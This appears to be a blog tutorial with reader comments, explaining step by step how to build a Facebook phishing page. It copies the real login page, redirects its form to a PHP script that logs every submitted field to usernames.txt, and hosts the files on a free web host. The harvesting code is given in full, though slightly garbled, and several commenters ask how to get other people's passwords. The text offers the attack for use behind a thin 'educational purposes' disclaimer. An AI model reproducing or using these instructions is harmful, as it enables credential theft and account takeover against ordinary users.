Phishing is a criminal activity that uses social engineering techniques. Hackers attempt to fraudulently acquire information such as username, passwords, and credit card details, by masquerading as a trustworthy entity in an electronic communication.
The most widely used technique in phishing is the use of Fake Log in Pages (phishing page), also known as spoofed pages. These fake login pages resemble the original login pages and look like the real website. But they are fake whose target is to get users password. Mostly phishing pages of sites like Facebook, Instagram, Yahoo, Gmail, MySpace, etc. are created by hackers. They mostly use these websites for an obvious reason, due to large users base.
Read More:
What is Phishing? Types of & techniques of Phishing Attack | How it works to hack accounts
z shadow Hack Facebook & Instagram – Get anyone password Secretly
The victim is fooled to believe the fake Facebook page to be the real one and enter his/her password. To protect yourself from phishing do not open fake or unknown links. Check the URL (website domain address) of the website before giving any information. Because a fake page has a different URL. Phishing FB is the common trick for so long time. So, most people know it. You can find some tips to prevent yourself from this type of hacking.
Create a Phishing Page (Step By Step Guide)
How to create this phishing page? Is it difficult to do that or there is any technical skill required for this like programming, networking, etc? Creating a phishing page is easy. You only need to learn some basic knowledge about how it works and the procedure on which it is working. You can learn everything in this article. Everything is explained in steps for educational purposes only.
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Step 1
In this article, I will show to create a facebook phishing page. To create phishing page, go to the and then right-click on the blank area, you will see the option view source page. Click on that.
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Step 2
Now a tab will open which will contain the source code of Facebook login page. Select all code and copy all code and paste it into notepad.
Suggested: Hacking Tricks and Prevention
Step 3
Now open notepad in which you have pasted this code and press CTRL+F and type ACTION.
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Step 4
You will have to search again and again till you have found the text which looks like
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Step 5
When you find something similar to this code (which is written above). Delete all the text code which is similar to the above code (written in grey colour box) and replace it with Post.php. Then it will look like action=”post.php.
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Step 6
Now save it to your desktop with the name index.htm and yes remember not to save it as index.html. As many individuals do this mistakes. Now you have completely made your phishing page.
Step 7
Now you need to create a PHP file for this. Open a new notepad and copy the code given below and save it with the name post.php.
header (‘Location:’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
fwrite($handle, “\r\n”);
Now, You have successfully created two files
- index.htm
- post.php
Step 8
Now you need to upload these two files in a free web hosting site. Some best Web hosting site which is useful for you. you need to make an account on any of one below web hosting site.
- Bluehost
- Freehosting
I prefer Many times, users facing a problem using the 000webhost website. So, in case if it not working or you are unable to upload the file. You may use other alternatives that I have given.
Step 9
Now, you have to sign up for an account. Click on free sign up and fill all required information in the registration form. When your account completely set up simply log in with your username and password.
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Step 10
Now open Cpanel (control panel) then click on file manager. After that, a new window will pop up. now go to public_html.
Step 11
Delete the file named default.php after that you need to upload index.htm and post.php file. Click on upload files button and upload both files one by one. Now click on index.htm which will look like same as that of the original Facebook page. This is your phishing page of Facebook.
Note: phishing is a criminal offense and illegal activity so don’t try to anyone. This tutorial is for educational purpose. You can learn these things to boost your knowledge and you can try it on your own system to learn it. Don’t try this on anyone else.
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For any help, you can leave a message on the Facebook page.
when i input text in the login button and press login, Error: is currently unable to handle this request.
So this is normal right. My concern is where i can find the inputted text or number in the login form.I checked the usernames.txt in the web file manager but it is empty. Did i miss something? im using login form.
Did u find out what the issue was?
How can I do that with my phone android 8.1
how to save in .htm? I’m on mac and on my notepad, I can only save in html.
Thank you for your help.
Try using another text editor. I use
I hope this was helpful
how do I collect or view others email and facebook password ?
Seems to work good.
Can you tell me what operating system you are using?
how do I collect or view others email and facebook password ?
where the phising password and user name are sotored
Fill in the page for more info
Hi how are u i thing you are fine will u come on my page